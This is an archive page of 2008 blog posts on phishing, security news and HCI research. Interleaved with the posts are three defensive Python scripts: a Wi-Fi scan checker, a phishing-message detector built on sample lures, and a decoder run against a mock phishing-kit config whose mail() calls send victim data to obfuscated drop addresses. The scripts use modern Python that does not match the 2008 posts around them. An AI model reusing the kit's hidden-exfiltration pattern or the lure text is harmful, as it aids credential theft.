Showing posts from 2008

Dressing up as a Phish

Sasha Romanosky points me to a story about a security analyst dressing up as a phish to educate students. This reminds me of that time Randy Pausch dressed up as some character from Alice in Wonderland and gave away Alice CDs. I have to admit, this is definitely going to be memorable for the students.

Tech-Security Official at U. of Virginia Wears Fish Costume to Raise Awareness of 'Phishing'

When Karen McDowell dressed up in a purple fish costume and walked around the University of Virginia’s campus last month, she got plenty of attention for her cause, even though she had to explain the meaning of her outfit. Ms. McDowell is a security analyst for the university, and her goal was to raise awareness about e-mail phishing schemes, in which con artists send e-mail messages hoping to lure people into giving out their passwords or other personal information.

When Phishing Education Goes Bad

A sad, funny, and frustrating story about phishing education. Don't know if this is true or not, but I can see it happening.

Auburn University's CIO sends out a warning to students, faculty, and staff about phishing, and includes an example of phishing in his email. A few days later, he sends out another email, excerpt below:

"In my previous alert, I included the text of a phishing email as an example. Some students misunderstood that I was asking for user name and password, and replied with that information. Please be aware that you shouldn’t provide this information to anyone."

Obama and McCain Computers Hacked

This Newsweek article talking about Obama and McCain computers being hacked is light on details (probably because of an ongoing investigation), but is disconcerting in terms of its implications.

At the Obama headquarters in midsummer, technology experts detected what they initially thought was a computer virus—a case of "phishing," a form of hacking often employed to steal passwords or credit-card numbers. But by the next day, both the FBI and the Secret Service came to the campaign with an ominous warning: "You have a problem way bigger than what you understand," an agent told Obama's team. "You have been compromised, and a serious amount of files have been loaded off your system."

Missed Connections

I've been a fan of Craigslist's Missed Connections for a while, as any of my friends will tell you. There's something wistful about them, as in a Krzysztof Kieślowski film. It turns out that CNN has an article about these kinds of sites, and that there were a lot more than I realized. CNN lists not only Craigslist, but also,, and

CNN: Sarkozy's bank account hacked

Not a lot of details, but it's likely a phishing attack, malware, or an inside job.

The French Cabinet's spokesman says "swindlers" have broken into the personal bank account of President Nicolas Sarkozy. French President Nicolas Sarkozy reported the theft from his account last month, say media. Spokesman Luc Chatel told France's Radio-J an investigation is under way and insists the incident "proves that this system of checking (bank accounts) via the Internet isn't infallible." He did not elaborate.

Teaching Consumers On-Line Safety Easiest When They Take the Bait

The Anti-Phishing Working Group (APWG) and Carnegie Mellon University’s Supporting Trust Decisions Project have established a phishing page redirect initiative that protects global online consumers who have been tricked into clicking links in scam emails by delivering them to Web pages that instruct them on the dangers of phishing – and how to avoid them. The program was announced today at the APWG conference in Atlanta.


A New Baby Naming Service

Here's a new baby naming service that we could all use: given your last name, which first names should you avoid so that your child won't end up on the TSA no-fly list?

“The woman at the ticket counter demanded, ‘Who is John Anderson?’ ” Ms. Anderson recalled. She pointed at the baby stroller and said, “He’s right here.” The suspect, then 2 years old, blinked his big blue eyes and happily gummed his pacifier. “That baby’s on the no-fly watch list,” the agent said.

It Would Take a Week to Read All Your Privacy Policies

Washington Post on some work being done at CMU


Lost in the Fine Print: It Would Take a Week to Read All Your Privacy Policies

It would take the average American about 42 hours -- an entire work week -- to read the online privacy policies for the Web sites they encounter each year, according to new research being presented this weekend.

Facebook Phishing

Some colleagues and I talked about this potential threat a few months ago, and it looks like it's finally starting to happen.

Some Facebook users checking their accounts Wednesday found odd postings of messages on their "wall" from one of their friends, saying: "lol i can't believe these pics got posted.... it's going to be BADDDD when her boyfriend sees these," followed by what looks like a genuine Facebook link.

But the link leads to a fake Facebook login page hosted on a Chinese .cn domain. The fake page actually logs the victims into Facebook, but also keeps a copy of their user names and passwords.

Soon after, the hackers post messages containing the same URL on the public "walls" of the users' friends. The technique is a powerful phishing scam, because the link seems to be coming from a trusted friend.


Hackers can use the compromised profiles to host Trojan horses such …

New IE8 Features for Anti-Phishing

The next version of Internet Explorer 8 will have new features to protect people from phishing attacks. Some of these features were developed by CMU's very own Serge Egelman. Nice work Serge!

Some highlights include:

Better warning messages (based on our past work on warnings in web browsers [PDF])
Better heuristics for detecting scams (I'd be interested in learning more about how these work)
Anti-malware support

Really interesting article in the NYTimes about the Eye-Fi card, which also geotags your photos for you using Skyhook.

Also, see below about interesting news about the location capabilities of the next iPhone.


[The Eye-Fi Share card] is a 2-gigabyte memory card ($100), compatible with most digital cameras, with a twist: it has Wi-Fi networking built in. Each time you bring your camera home to your wireless network, it transmits your photos back to the computer, automatically and wirelessly. It can also upload them to Flickr, Picasa or another online photo-gallery site, automatically and wirelessly.

You know how your digital camera gives every photo an invisible time and date stamp? Well, the Eye-Fi Explore ($130) card invisibly stamps every photo with where you took it.


(Indeed, the new iPhone, coming July 11, incorporates both G.P.S. and Skyhook. It even has a third location system, developed by Google, that pinpoints your location by studying your proximity to cellphone towers.…

World of Warcraft introducing 2-Factor Authentication

I didn't expect to have two posts in a row about World of Warcraft, but I found this one too interesting to resist. It looks like Blizzard will be making physical tokens available for customers to purchase, to increase the security of their accounts. Apparently, there have been many hacked accounts, leading to the loss of (virtual) gold and items. This was a venue for phishing and malware that I didn't see coming, but it makes sense once you see how the value chain eventually ends up as cash.

A fun read about a scientific conference held in World of Warcraft about World of Warcraft.

Thus began the first scientific conference held in Azeroth, the online universe inhabited by millions of people playing World of Warcraft. Anyone who has been part of a conference's organizing committee knows that some glitches and mishaps are just unavoidable. And as usual, the problems that actually did occur were unforeseen. It was a success nonetheless. By the end of the third day, a real scientific exchange took place, I married one of the conference participants, and within an hour of the wedding, we were all dead.


With fireworks bursting and confetti still drifting all around the dancing mob of wedding guests, Catullus announced the final event: a massive attack on Sentinel Hill, an Alliance stronghold. As we surged over the hills around the unsuspecting fort, everyone yelled, "For Science!" Bainbridge had enlisted the help of Alea Iacta Est, the largest guild in Azeroth. …

Microsoft Hires CastleCops founder

Microsoft has hired Paul Laudanski, the man behind the anti-phishing website, to help with the software company's phishing and spam investigations.

Laudanski, a former volunteer firefighter, announced the move on last week, saying that he's looking to find someone else to run the site that he founded in 2002.

Walt Mossberg on Protecting Yourself from Identity Theft

You know phishing has become a mainstream problem when Walt Mossberg writes about it.

When most people think about Internet security problems, they focus on viruses and spyware -- technological attacks that can usually be mitigated by technological defenses. But the most insidious Internet security problems today rely on human gullibility, not tricky software...These types of attacks are called "social engineering," and they are used by criminals to steal your money and identity, and to plant on your computer malicious software that can be used to keep ripping you off.


John Seely Brown presents a nice framework for thinking about innovation:

Incremental innovation, that is "cheaper, thinner, faster and, of course, more features."
Architectural innovations, which involve "a restructuring of the very building blocks of a product family, industry, or infrastructure." Think Skype or Cloud Computing, which offers a new way of doing something we're already doing.
Disruptive innovations, which are innovations that "cause us to see and interact with the world differently." Examples include Memex, automobiles, and Sketchpad.

Attorney General Mukasey Outlines Criminal Threats to Infrastructure

Article in CNN describes Mukasey's description of the problems. Most relevant for our work in computer science:

The use of cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures and the security and solvency of financial investment markets.

Business Week on E-Spionage

Business Week has a really interesting article on the growing threat of e-spionage.

The U.S. government, and its sprawl of defense contractors, have been the victims of an unprecedented rash of similar cyber attacks over the last two years, say current and former U.S. government officials. "It's espionage on a massive scale," says Paul B. Kurtz, a former high-ranking national security official. Government agencies reported 12,986 cyber security incidents to the U.S. Homeland Security Dept. last fiscal year, triple the number from two years earlier. Incursions on the military's networks were up 55% last year, says Lieutenant General Charles E. Croom, head of the Pentagon's Joint Task Force for Global Network Operations. Private targets like Booz Allen are just as vulnerable and pose just as much potential security risk.


On Apr. 8, Homeland Security Dept. Secretary Michael Chertoff called the President's order a cyber security "Manhattan Project."


Utility of Multicore Chips?

I have to admit that I'm a skeptic of multicore chips. Even though they're part of many CPUs shipping today, it's just not clear to me what problem they solve. We're already seeing diminishing returns from CPU performance, in terms of human productivity. The bottleneck just isn't the microprocessor anymore.

Don Knuth also sees some challenges for multicore:

Let me put it this way: During the past 50 years, I’ve written well over a thousand programs, many of which have substantial size. I can’t think of even five of those programs that would have been enhanced noticeably by parallelism or multithreading. Surely, for example, multiple processors are no help to TeX.

On the other hand, multicore might represent an opportunity. One of the trends in research this past decade has been novel ways of "wasting" CPU to enable other desirable properties, such as security and usability. All we need now is a clearer path for making this happen.

Google Lookup Feature

This is a really neat feature in Google Spreadsheets:

To insert the number of Internet users in Paraguay:
=GoogleLookup("Paraguay"; "internet users")
To insert the Earned Run Average of Roger Clemens:
=GoogleLookup("Roger Clemens"; "earned run average")

NYTimes: It Takes a Cyber Village to Catch an Auto Thief

I like this idea of "open-source crime solving", as it reminds me a lot of PhishTank and CastleCops. It is, however, an idea that is fraught with issues of trust, reliability, and vigilantism.

Online auto forums have helped unravel crimes before. Two years ago, a detective in Los Angeles used the forum on, a Nissan enthusiast site, to track down victims of an elaborate fraud scheme. (That case, too, involved Nissan Skylines.)

The site had also played a role in earlier cases of what might be called open-source crime solving. A year ago one of its members saw a hit-and-run accident a block in front of him, said Shelton Kwan, who co-founded the site with his cousin Ken Chan in 2002. “He took pictures. And the guy who got hit was another member of ours.”

NYTimes Link

Free Public Wifi!

Finally, an explanation for why I keep seeing "Free Public Wifi" in more and more places.

...Windows XP and friends are designed to pretend to be certain kinds of WiFi networks that you might have connected to in the past (a so-called AdHoc or peer-to-peer WiFi network). AdHoc networks aren't that common, but the point is that if you ever tried to connect to one with your WinXP laptop, later on it will broadcast to the world that it is that network.

Then other laptops will see that network, and some will try to connect, and they are then "infected" with this broadcasting "virus." It's not a traditional computer virus of course, just a set of behaviors that spread virally. The most widely spread early names will continue to spread even more because of the nature of this system. Ever see a network called "Free Public WiFi" but when you connect, it didn't work? Congratulations, you are now part of the problem....…
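As an added example (my own code, not from the post quoted above), here is a quick check for the behavior it describes: it reads a scan in the general shape of Windows' `netsh wlan show networks mode=bssid` output and flags open ad-hoc SSIDs, which are exactly the networks that can't get you online and that an XP-era laptop would later re-broadcast. The scan text is constructed for the demo, the field names are my assumption about that output format, and only the SSID the post names is on the known-viral list.

```python
"""Flag open ad-hoc SSIDs in a Windows wireless scan (added example)."""
import re
import sys

# Constructed sample in the general shape of `netsh wlan show networks
# mode=bssid` output (assumption about the format; not a real capture).
SAMPLE_SCAN = """\
Interface name : Wireless Network Connection
There are 3 networks currently visible.

SSID 1 : CoffeeShop
    Network type            : Infrastructure
    Authentication          : Open
    Encryption              : None
    BSSID 1                 : 00:11:22:33:44:55
         Signal             : 75%

SSID 2 : Free Public WiFi
    Network type            : Adhoc
    Authentication          : Open
    Encryption              : None
    BSSID 1                 : 02:0a:0b:0c:0d:0e
         Signal             : 40%

SSID 3 : HomeNet
    Network type            : Infrastructure
    Authentication          : WPA2-Personal
    Encryption              : CCMP
    BSSID 1                 : 00:aa:bb:cc:dd:ee
         Signal             : 90%
"""

# SSIDs known to spread laptop-to-laptop. Only the name the post mentions is
# listed; extend it from your own scans.
VIRAL_SSIDS = {"free public wifi"}

_SSID_LINE = re.compile(r"^SSID\s+\d+\s*:\s*(.*)$")
_FIELD = re.compile(r"^\s+(Network type|Authentication|Encryption)\s*:\s*(.*)$")


def parse_scan(text):
    """Return one dict per SSID block with the fields we care about."""
    nets, cur = [], None
    for line in text.splitlines():
        m = _SSID_LINE.match(line)
        if m:
            cur = {"ssid": m.group(1).strip()}
            nets.append(cur)
            continue
        m = _FIELD.match(line)
        if m and cur is not None:
            cur[m.group(1).lower()] = m.group(2).strip()
    return nets


def suspicious_networks(nets):
    """(ssid, reason) for ad-hoc networks that are open or carry a viral name."""
    out = []
    for n in nets:
        adhoc = n.get("network type", "").lower() == "adhoc"
        open_net = n.get("encryption", "").lower() == "none"
        name = n["ssid"].lower()
        if adhoc and (open_net or name in VIRAL_SSIDS):
            why = "known viral ad-hoc SSID" if name in VIRAL_SSIDS else "open ad-hoc network"
            out.append((n["ssid"], why))
    return out


if __name__ == "__main__":
    # Pipe real `netsh` output in, or run with no input to use the sample.
    scan = SAMPLE_SCAN if sys.stdin.isatty() else sys.stdin.read()
    for ssid, why in suspicious_networks(parse_scan(scan)):
        print(f"{ssid!r}: {why}")
```

The open coffee-shop network is not flagged: it is infrastructure mode, and the post's point is specifically about ad-hoc networks that a laptop impersonates. Anything that shows up as ad-hoc and open is worth not clicking on, whatever it is called.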

CMU HCII's Johnny Lee featured in Business Week Interview

Apparently, an interview with Business Week reveals that CMU's very own Johnny Lee is now the leader of a cult! :)

Congratulations Johnny!

Over the past 12 months, a series of quirky but compelling videos uploaded to Google's (GOOG) YouTube have been delighting hackers, designers, and tech tinkerers worldwide. The videos, which feature modifications of Nintendo's (NTDOY) popular Wii console to create everything from mind-boggling 3D images to interactive whiteboards, have earned their creator a cultlike following and inspired countless other experiments.


Twenty Years of Four HCI Conferences

This is an interesting article showing various visualizations of four different HCI conferences: CHI, UIST, InfoVis, and AVI. There is certainly an element of navel gazing going on here, but I also think it's interesting what kinds of conclusions can be drawn from the different visualizations.

The authors also present some strategies for producing key publications:

Have the right idea at the right time
Collaborate with other senior researchers
Supervise a good number of (good) students
Publish in the right conferences

HCII candidates for YouTube Awards

"The Human-Computer Interaction Institute is well represented among the nominees for the second annual YouTube Awards.

The video of Prof. Randy Pausch’s Sept. 18 lecture, “Really Achieving Your Childhood Dreams,” has been nominated for Most Inspirational. PhD student Johnny Chung Lee and his “Head Tracking for Desktop VR” video are nominated in the Instructional Video category.

Winners will be chosen based on popular voting. Individuals can vote once a day in each of the 12 YouTube categories through March 19. "

Phishing Attack against CMU

Well, this was bound to happen sooner or later, but there was a recent phishing attack targeting members of the CMU community. And, no, this wasn't an experiment from our research team.

SCS Computing Facilities has received the following announcement from campus Computing Services.

*** To verify the authenticity of this message, see Security News & Events at ***

WHO: Everyone
WHAT: Phishing Emails Sent to Carnegie Mellon Accounts
WHEN: Feb 21, 2008

HOW: Fraudulent emails have recently been sent to Carnegie Mellon email accounts claiming to be from the "CMU SUPPORT TEAM" asking people to reply with their "CMU Webmail account" passwords.
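Two of the heuristics these posts keep circling (the Facebook wall post whose link looks like facebook.com but goes to a .cn domain, the IE8 "heuristics for detecting scams," and this campus lure asking people to reply with their passwords) are simple enough to show in a few dozen lines. This is an added example of mine, not code from any of the articles quoted or from any browser; the three messages are constructed, the .cn host name is made up, and the domain comparison is deliberately crude (last two DNS labels).

```python
"""Two phishing heuristics (added example): link text/href domain mismatch
and "reply with your password" requests, with a guard for negated advice."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = (dict(attrs).get("href") or ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two DNS labels. Assumption: fine for the .com/.cn demo hosts;
    real code should use the Public Suffix List (co.uk and friends)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


# A host name inside link text, with or without a scheme.
_DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")


def link_mismatches(html_body):
    """Anchors whose visible text names one registrable domain while the
    href points at another: the facebook.com-lookalike-on-.cn pattern."""
    parser = _AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.anchors:
        shown = _DOMAIN_IN_TEXT.search(text)
        if not shown:
            continue  # "click here" style text gives nothing to compare
        real_host = urlparse(href).hostname or ""
        if registrable_domain(shown.group(1)) != registrable_domain(real_host):
            findings.append((text, href))
    return findings


# "reply/send/e-mail ... password(s)" within 80 characters ...
_REQUEST = re.compile(
    r"\b(?:reply|respond|send|e-?mail)\b.{0,80}?\bpass(?:words?|wd|phrase)\b",
    re.IGNORECASE | re.DOTALL)
# ... unless a negation sits just before the verb ("never send your password").
_NEGATED = re.compile(
    r"\b(?:never|not|don't|do not|shouldn't|should not)\b\W+(?:\w+\W+){0,2}$",
    re.IGNORECASE)


def asks_for_password_by_reply(html_body):
    """True when the message asks the reader to send a password back."""
    text = html.unescape(re.sub(r"<[^>]+>", " ", html_body))
    for m in _REQUEST.finditer(text):
        lead = text[max(0, m.start() - 40):m.start()]
        if _NEGATED.search(lead):
            continue  # advice against sending passwords is not a lure
        return True
    return False


def analyze(html_body):
    return {"link_mismatches": link_mismatches(html_body),
            "password_by_reply": asks_for_password_by_reply(html_body)}


# Constructed sample messages; the .cn host is made up for the demo.
WALL_POST = (
    "<p>lol i can't believe these pics got posted.... it's going to be BADDDD "
    "when her boyfriend sees these "
    '<a href="http://www.facebook.com.login-verify.cn/index.php">'
    "http://www.facebook.com/photo.php?pid=123</a></p>")
SUPPORT_LURE = (
    "<p>Your CMU Webmail account will be deactivated. Reply to this message "
    "with your CMU Webmail account username and password to keep it active."
    "<br>CMU SUPPORT TEAM</p>")
REAL_ADVISORY = (
    "<p>Please be aware that you shouldn't provide this information to anyone. "
    "Never send your password by e-mail. Help: "
    '<a href="https://www.facebook.com/help">https://www.facebook.com/help</a></p>')

if __name__ == "__main__":
    for name, msg in [("wall post", WALL_POST), ("lure", SUPPORT_LURE), ("advisory", REAL_ADVISORY)]:
        print(name, analyze(msg))
```

The negation guard is there because of the Auburn episode above: a warning that tells people never to send their password contains the same words as the lure, and a filter that only counts keywords flags the CIO's warning along with the phish. The last-two-labels domain rule is the weakest part of this; for anything beyond a demo, swap in the Public Suffix List.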


Gorgeous Virtual Book

This is a digital online book that demonstrates a variety of user interactions. It's really beautiful and well done.

Why Programming Languages need More HCI

I just posted a comment to Lambda the Ultimate trying to clarify some misunderstandings about user testing and HCI. Here is the original comment, and my reply is below.

I just created an account to reply to the above post. Just for background purposes, I teach human-computer interaction at Carnegie Mellon University, and am part of the School of Computer Science.

I believe the above poster is making a similar argument that Doug Engelbart made a long time back about the difference between tricycles and bicycles. More specifically, if ease of use was all that mattered, then we would all be riding tricycles.

However, I believe that the above post shows a common misunderstanding of the nature of user tests, and human-computer interaction more broadly. Specifically, HCI is not just about ease of use for "walk up and use" interfaces. We advocate that designers should understand the context of use, set appropriate goals, and measure that we are achieving those goals. Like security or…

Resolved: Should Squirrels be Considered the Superior Species on Earth?

After watching this video of squirrels running through obstacle courses, I'm not so sure we humans should be so proud of our achievements:

When Toolkits Go Bad

As someone who has been involved in the development of some user interface toolkits, I have to admit I'm simultaneously amused and really annoyed at this latest development, namely phishing toolkits that lower the barriers to entry for criminals.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

This one toolkit, however, is somewhat humorous in that it tries to scam the scammers.

Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by t…
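Since the article says the deceptive code hides the real set of addresses, here is an added example (my code, run against a made-up config.php, not the Mr-Brain kit itself) of the kind of static check that surfaces them: it lists the addresses written in the clear, then decodes three common PHP obfuscations (base64_decode(), chr() chains, and \xNN string escapes) and reports anything that only appears after decoding. The addresses and the PHP are constructed for the demo.

```python
"""Find hidden drop addresses in a phishing-kit config (added example)."""
import base64
import re

# Constructed stand-in for a kit's config.php (not the real kit's code). The
# buyer edits $send; the kit author's own copies hide in $re, $cc and $bcc.
KIT_CONFIG = r'''<?php
$send = "dropbox@example.net";
$subj = "Result from Bank";
$re   = base64_decode("aGlkZGVuQGV4YW1wbGUub3Jn");
$cc   = chr(107).chr(105).chr(116).chr(64).chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109);
$bcc  = "\x61\x64\x6d\x69\x6e\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d";
mail($send, $subj, $body); mail($re, $subj, $body); mail($cc, $subj, $body); mail($bcc, $subj, $body);
?>'''

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def literal_emails(src):
    """Addresses written in the clear: what a casual reader of the kit sees."""
    return set(EMAIL.findall(src))


def base64_emails(src):
    """Addresses inside base64_decode("...") calls."""
    found = set()
    for blob in re.findall(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", src):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        found.update(EMAIL.findall(decoded))
    return found


def chr_emails(src):
    """Runs of chr(n).chr(n)... rebuilt into a string (PHP chr is mod 256)."""
    found = set()
    for run in re.findall(r"(?:chr\(\s*\d+\s*\)\s*\.?\s*){3,}", src):
        decoded = "".join(chr(int(n) % 256) for n in re.findall(r"chr\(\s*(\d+)\s*\)", run))
        found.update(EMAIL.findall(decoded))
    return found


def hex_escape_emails(src):
    """Double-quoted PHP strings built from \\xNN escapes."""
    found = set()
    for run in re.findall(r"(?:\\x[0-9A-Fa-f]{2}){3,}", src):
        decoded = bytes.fromhex(run.replace("\\x", "")).decode("latin-1")
        found.update(EMAIL.findall(decoded))
    return found


def find_drop_addresses(src):
    """Visible recipients versus recipients that only appear after decoding."""
    visible = literal_emails(src)
    hidden = (base64_emails(src) | chr_emails(src) | hex_escape_emails(src)) - visible
    return {"visible": visible, "hidden": hidden}


if __name__ == "__main__":
    for kind, addrs in find_drop_addresses(KIT_CONFIG).items():
        print(kind, sorted(addrs))
```

A kit that routes the address through eval() or gzinflate() needs the decoded payload fed back through the same scan; the point of the check is that the buyer's config variable is not the only recipient, so the real question is how many mail() calls the kit ends up making, not what $send says.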

San Juan Airport Wifi

While on a layover in the San Juan airport in Puerto Rico, I was checking if there were any WiFi access points around, and saw this humorously named hotspot.

The Highest Rated Youtube Video of all time is...

by the HCII's very own Johnny Lee, on using Nintendo Wiimotes for head tracking for desktop virtual reality. 1.7 million views since it was posted 2 weeks ago. Way to go Johnny!